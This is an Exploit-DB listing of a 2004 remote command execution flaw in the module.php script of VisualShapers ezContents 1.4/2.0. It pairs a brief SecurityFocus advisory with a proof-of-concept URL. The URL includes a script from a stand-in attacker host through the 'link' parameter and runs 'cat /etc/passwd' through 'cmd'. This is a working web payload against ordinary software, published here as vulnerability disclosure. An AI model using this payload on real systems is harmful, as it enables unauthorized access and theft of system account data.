VisualShapers EZContents 1.4/2.0 - 'module.php' Remote Command Execution

EDB-ID:

23537


Author:

Zero X

Type:

webapps


Platform:

PHP

Date:

2004-01-10


source: https://www.securityfocus.com/bid/9396/info

A problem in handling of specific types of input passed to the module.php script in VisualShapers ezContents has been discovered. Because of this, an attacker may be able to gain unauthorized access to vulnerable systems.

http://www.example.com/module.php?link=http://attacker.example.com/index.php&cmd=cat /etc/passwd